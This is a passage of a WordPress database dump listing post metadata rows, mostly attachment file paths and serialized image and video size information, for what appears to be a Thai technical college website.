eywords\";a:0:{}}}'),
(15747, 6664, '_thumbnail_id', '6665'),
(15750, 6664, '_hide_featured', NULL),
(15755, 6668, '_wp_attached_file', '2020/01/290162-25.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(15756, 6668, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2020/01/290162-25.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-25-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-25-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-25-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15779, 6682, '_wp_attached_file', '2020/01/602121750.065525.mp4'),
(15780, 6682, '_wp_attachment_metadata', 'a:10:{s:8:\"filesize\";i:17837172;s:9:\"mime_type\";s:9:\"video/mp4\";s:6:\"length\";i:110;s:16:\"length_formatted\";s:4:\"1:50\";s:5:\"width\";i:656;s:6:\"height\";i:474;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:7:{s:10:\"dataformat\";s:3:\"mp4\";s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:44100;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";}s:17:\"created_timestamp\";i:1580428950;}'),
(15781, 6683, '_wp_attached_file', '2020/01/Untitled-1.jpg'),
(15782, 6683, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:900;s:6:\"height\";i:900;s:4:\"file\";s:22:\"2020/01/Untitled-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15783, 6684, '_wp_attached_file', '2020/01/ปุ่มไอคอน1.jpg'),
(15784, 6684, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:900;s:6:\"height\";i:900;s:4:\"file\";s:40:\"2020/01/ปุ่มไอคอน1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"ปุ่มไอคอน1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"ปุ่มไอคอน1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"ปุ่มไอคอน1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:40:\"ปุ่มไอคอน1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15787, 6687, '_wp_attached_file', '2020/01/แบบร่างตัวอย่างใบงาน.png'),
(15788, 6687, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:150;s:4:\"file\";s:72:\"2020/01/แบบร่างตัวอย่างใบงาน.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:72:\"แบบร่างตัวอย่างใบงาน-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:71:\"แบบร่างตัวอย่างใบงาน-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:72:\"แบบร่างตัวอย่างใบงาน-400x100.png\";s:5:\"width\";i:400;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15789, 6692, '_edit_lock', '1582096587:14'),
(15790, 6692, '_edit_last', '14'),
(15791, 6693, '_wp_attached_file', '2020/01/แบบ.doc'),
(15792, 6694, '_wp_attached_file', '2020/01/ใบงาน15-การฉีด-Oscill.pdf'),
(15793, 6695, '_wp_attached_file', '2020/01/ใบเนื้อหาหน่วย7.pdf'),
(15794, 6696, '_edit_lock', '1585040721:14'),
(15795, 6696, '_edit_last', '14'),
(15796, 6697, '_wp_attached_file', '2020/01/คำสั่งเวร-ยาม-เดือน-กุมภาพันธ์-พ.ศ.2563.pdf'),
(15799, 6696, '_hide_featured', NULL),
(15804, 6701, '_wp_attached_file', '2020/01/แบบบ.pdf'),
(15805, 6702, '_wp_attached_file', '2020/01/แบบบ-1.pdf'),
(15806, 6692, '_hide_featured', NULL),
(15807, 6705, '_edit_lock', '1580456809:14'),
(15808, 6705, '_edit_last', '14'),
(15811, 6705, '_hide_featured', NULL),
(15814, 6713, '_wp_attached_file', '2020/01/5ไฮไลต์การใช้เครื่องมือ.mp4'),
(15815, 6713, '_wp_attachment_metadata', 'a:10:{s:8:\"filesize\";i:37746512;s:9:\"mime_type\";s:9:\"video/mp4\";s:6:\"length\";i:126;s:16:\"length_formatted\";s:4:\"2:06\";s:5:\"width\";i:720;s:6:\"height\";i:576;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:7:{s:10:\"dataformat\";s:3:\"mp4\";s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:48000;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";}s:17:\"created_timestamp\";i:-2082844800;}'),
(15820, 6721, '_wp_attached_file', '2020/01/Untitled-6.png'),
(15821, 6721, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2020/01/Untitled-6.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-6-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-6-300x120.png\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-6-768x307.png\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-6-1024x410.png\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-6-400x160.png\";s:5:\"width\";i:400;s:6:\"height\";i:160;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15825, 6728, '_wp_attached_file', '2020/01/Untitled-8.png'),
(15826, 6728, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2020/01/Untitled-8.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-8-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-8-300x120.png\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-8-768x307.png\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-8-1024x410.png\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-8-400x160.png\";s:5:\"width\";i:400;s:6:\"height\";i:160;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15827, 6732, '_wp_attached_file', '2020/01/รูปอาจารย์.png'),
(15828, 6732, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:900;s:4:\"file\";s:42:\"2020/01/รูปอาจารย์.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"รูปอาจารย์-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"รูปอาจารย์-200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:42:\"รูปอาจารย์-200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15833, 6741, '_wp_attached_file', '2020/02/กรอบรูป-3-.png'),
(15834, 6741, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:900;s:4:\"file\";s:36:\"2020/02/กรอบรูป-3-.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"กรอบรูป-3--150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"กรอบรูป-3--200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"กรอบรูป-3--200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15835, 6743, '_wp_attached_file', '2020/02/กรอบรูป4-.png'),
(15836, 6743, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:900;s:4:\"file\";s:35:\"2020/02/กรอบรูป4-.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"กรอบรูป4--150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"กรอบรูป4--200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:35:\"กรอบรูป4--200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15837, 6749, '_wp_attached_file', '2020/02/กรอบรูป6-.png'),
(15838, 6749, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:900;s:4:\"file\";s:35:\"2020/02/กรอบรูป6-.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"กรอบรูป6--150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"กรอบรูป6--200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:35:\"กรอบรูป6--200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15839, 6750, '_wp_attached_file', '2020/02/กรอบรูป5-.png'),
(15840, 6750, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:900;s:4:\"file\";s:35:\"2020/02/กรอบรูป5-.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"กรอบรูป5--150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"กรอบรูป5--200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:35:\"กรอบรูป5--200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15841, 6752, '_wp_attached_file', '2020/02/บริหาร.png'),
(15842, 6752, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:30:\"2020/02/บริหาร.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"บริหาร-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"บริหาร-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"บริหาร-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"บริหาร-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"บริหาร-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16032, 6917, '_edit_lock', '1581050929:14'),
(16033, 6917, '_edit_last', '14'),
(16036, 6920, '_wp_attached_file', '2020/02/unnamed-file.mp4'),
(16037, 6920, '_wp_attachment_metadata', 'a:10:{s:8:\"filesize\";i:12649771;s:9:\"mime_type\";s:9:\"video/mp4\";s:6:\"length\";i:126;s:16:\"length_formatted\";s:4:\"2:06\";s:5:\"width\";i:676;s:6:\"height\";i:540;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:7:{s:10:\"dataformat\";s:3:\"mp4\";s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:44100;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";}s:17:\"created_timestamp\";i:-2082844800;}'),
(16038, 6917, '_hide_featured', NULL),
(16039, 6923, '_wp_attached_file', '2020/02/Untitled-1.png'),
(16040, 6923, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:22:\"2020/02/Untitled-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-1-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-1-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-1-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16099, 6978, '_edit_lock', '1581586661:14'),
(16100, 6978, '_edit_last', '14'),
(16101, 6979, '_wp_attached_file', '2020/02/ปฎิทินรับสมัครสอบ.pdf'),
(16102, 6978, '_hide_featured', NULL),
(16231, 7095, '_wp_attached_file', '2019/12/ระบบรับสมัคร.png'),
(16232, 7095, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:300;s:4:\"file\";s:48:\"2019/12/ระบบรับสมัคร.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"ระบบรับสมัคร-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"ระบบรับสมัคร-300x60.png\";s:5:\"width\";i:300;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:48:\"ระบบรับสมัคร-768x154.png\";s:5:\"width\";i:768;s:6:\"height\";i:154;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"ระบบรับสมัคร-1024x205.png\";s:5:\"width\";i:1024;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:47:\"ระบบรับสมัคร-400x80.png\";s:5:\"width\";i:400;s:6:\"height\";i:80;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16264, 7120, '_edit_lock', '1581586235:14'),
(16265, 7121, '_wp_attached_file', '2020/02/ประกาศวิทยาลัยเทคนิคระยอง-เรื่อง-กำหนดการ.pdf'),
(16266, 7120, '_edit_last', '14'),
(16267, 7120, '_hide_featured', NULL),
(16268, 7123, '_wp_attached_file', '2019/12/กำหนดการเปิด-ปิด-63.png'),
(16269, 7123, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:300;s:4:\"file\";s:61:\"2019/12/กำหนดการเปิด-ปิด-63.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:61:\"กำหนดการเปิด-ปิด-63-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"กำหนดการเปิด-ปิด-63-300x60.png\";s:5:\"width\";i:300;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"กำหนดการเปิด-ปิด-63-768x154.png\";s:5:\"width\";i:768;s:6:\"height\";i:154;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:62:\"กำหนดการเปิด-ปิด-63-1024x205.png\";s:5:\"width\";i:1024;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"กำหนดการเปิด-ปิด-63-400x80.png\";s:5:\"width\";i:400;s:6:\"height\";i:80;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16270, 7126, '_wp_attached_file', '2019/12/ปฏิทินรับสมัครสอบคัดเลือก.png'),
(16271, 7126, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:300;s:4:\"file\";s:87:\"2019/12/ปฏิทินรับสมัครสอบคัดเลือก.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:87:\"ปฏิทินรับสมัครสอบคัดเลือก-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:86:\"ปฏิทินรับสมัครสอบคัดเลือก-300x60.png\";s:5:\"width\";i:300;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:87:\"ปฏิทินรับสมัครสอบคัดเลือก-768x154.png\";s:5:\"width\";i:768;s:6:\"height\";i:154;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:88:\"ปฏิทินรับสมัครสอบคัดเลือก-1024x205.png\";s:5:\"width\";i:1024;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:86:\"ปฏิทินรับสมัครสอบคัดเลือก-400x80.png\";s:5:\"width\";i:400;s:6:\"height\";i:80;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1: